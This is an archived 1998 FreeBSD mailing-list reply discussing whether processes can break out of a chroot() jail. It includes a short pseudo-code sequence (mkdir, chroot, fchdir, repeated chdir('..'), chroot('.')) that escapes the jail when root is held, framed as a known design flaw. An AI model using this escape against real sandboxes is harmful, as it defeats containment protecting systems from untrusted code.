Skip site navigation (1)Skip section navigation (2) 
Date:      Tue, 17 Nov 1998 12:54:19 +0100
From:      Eivind Eklund <eivind@yes.no>
To:        Mike Smith <mike@smith.net.au>, Harold Gutch <logix@foobar.franken.de>
Cc:        zhihuizhang <bf20761@binghamton.edu>, hackers <freebsd-hackers@FreeBSD.ORG>
Subject:   Re: Question on chroot()
Message-ID:  <19981117125419.28799@follo.net>
In-Reply-To: <199811152056.MAA14163@dingo.cdrom.com>; from Mike Smith on Sun, Nov 15, 1998 at 12:56:03PM -0800
References:  <19981115200813.B12524@foobar.franken.de> <199811152056.MAA14163@dingo.cdrom.com>
next in thread | previous in thread | raw e-mail | index | archive | help 

On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
> > On Sun, Nov 15, 1998 at 09:56:32AM -0800, Mike Smith wrote:
> > > Breaking out of a chroot'ed environment is less easy if you're not 
> > > root
> > Is this meant to be read as "more or less impossible", that is,
> > impossible unless the user can become root first (due to insecure
> > suid-root binaries in the chroot-environment etc.), or can users
> > really break out in more or less every situation (of course
> > assuming stuff like that they don't have any open filehandles
> > pointing to the outside in the beginning).
> 
> It's quite difficult to break out of a chroot'ed environment, yes, and 
> it's intended to be impossible, so obviously you can only get out 
> through flaws in the implementation...

It is easy if you have root privileges inside the "jail".

	/* pseudo-code */
	mkdir("mybreakdir", 0700);
	breakfd = open(".", 0, 0);
	chroot("mybreakdir");
	fchdir(breakfd);
	for (i=0; i<1000; i++)
		chdir("..");
	chroot(".");

I'm not sure if you need the fchdir(); chroot() is not supposed to
affect your current directory.  I don't think anybody has fixed the
above problem; it seems quite difficult to fix (you have to know which
FDs are inside and outside the jail, which is non-trivial).

Eivind.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19981117125419.28799>